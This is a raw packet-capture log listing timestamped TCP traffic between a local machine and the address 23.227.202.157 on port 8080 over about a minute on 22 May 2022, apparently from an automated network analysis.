May 22, 2022 12:33:32.385394096 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385410070 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385416985 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385457039 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385499001 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385523081 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385536909 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385577917 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385601044 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385617971 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385658979 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385691881 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385699987 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385740042 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385778904 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385787964 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385819912 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385859013 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385880947 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385898113 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385922909 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385936975 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385977030 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386002064 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.386018038 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386055946 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386090040 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.386097908 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386138916 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386167049 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.386177063 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386218071 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386243105 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.386255980 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386296988 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386336088 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386360884 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.386367083 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.386430979 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.496072054 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.628777981 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.628843069 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.628884077 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.628923893 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.628962994 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.628978968 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629003048 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629004002 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629045963 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629084110 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629127979 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629133940 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629138947 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629168987 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629209042 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629249096 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629287958 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629297018 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629301071 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629327059 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629368067 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629404068 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629442930 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629458904 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629462957 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629482985 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629520893 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629559994 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629599094 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629605055 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629610062 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629640102 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629681110 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629719019 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629760027 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629797935 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629816055 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629822016 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629834890 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629874945 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629913092 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629951954 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.629962921 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629967928 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.629992962 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630032063 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630073071 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630079985 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630085945 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630120993 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630160093 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630198002 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630237103 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630249023 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630254030 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630275965 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630316973 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630354881 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630393982 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630398989 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630403996 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630433083 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630470991 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630510092 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630548954 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630564928 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630573034 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630588055 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630629063 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630666971 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630696058 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.630753994 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.630762100 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.050842047 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.183476925 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183532000 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183569908 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183608055 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183633089 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.183646917 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183671951 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.183689117 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183729887 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183753014 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.183768034 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183808088 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183846951 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183864117 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.183885098 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183904886 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.183926105 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183965921 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.183981895 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184005976 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184046030 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184084892 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184089899 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184124947 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184165001 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184190035 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184201956 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184226990 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184246063 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184286118 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184324980 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184325933 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184369087 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184395075 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184407949 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184448004 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184478998 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184518099 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184557915 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184596062 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184616089 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184634924 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184648991 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184674025 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184715033 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184737921 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184756994 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184797049 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184830904 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:34.184859991 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:34.184880972 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:35.111253977 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:42.806701899 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:42.990052938 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:49.449343920 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:49.450175047 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:49.633308887 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:09.461141109 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:09.466955900 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:09.651067019 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.473592043 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.474606037 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.652056932 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.770776987 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.776623964 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.912606955 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912667990 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912708044 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912749052 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912766933 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.912791014 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912832022 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912872076 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.912873030 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912914038 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912920952 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.912956953 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.912971020 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913000107 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913038015 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913053036 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913079977 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913121939 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913158894 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913161993 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913199902 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913238049 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913239002 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913279057 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913295031 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913321972 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913358927 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913377047 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913400888 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913439989 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913456917 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913480043 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913518906 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913532972 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913558006 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913598061 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913609982 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913640976 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913680077 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913697958 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913721085 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913760900 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913783073 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913800001 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913840055 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913851023 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913880110 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913919926 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913932085 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.913960934 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.913997889 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914011002 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.914061069 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914100885 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914113045 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.914144039 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914182901 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914199114 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.914222002 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914263010 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914277077 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.914304972 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914343119 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914359093 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.914386034 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914424896 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914438963 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:34:29.914463997 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914501905 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:34:29.914552927 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                                                                  May 22, 2022 12:34:29.914565086 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:29.914592981 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:29.914648056 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047167063 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047224045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047265053 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047302961 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047341108 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047382116 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047385931 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047420979 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047424078 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047452927 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047462940 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047504902 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047529936 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047533035 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047575951 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047612906 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047636032 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047652960 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047693014 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047709942 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047730923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047770977 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047787905 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047810078 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047851086 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047863007 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047892094 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047939062 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.047971010 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.047981024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048022985 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048038006 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048060894 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048099995 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048114061 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048141956 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048180103 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048213959 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048218966 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048266888 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048281908 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048305988 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048346996 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048358917 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048387051 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048427105 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048435926 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048468113 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048526049 CEST497408080192.168.2.323.227.202.157
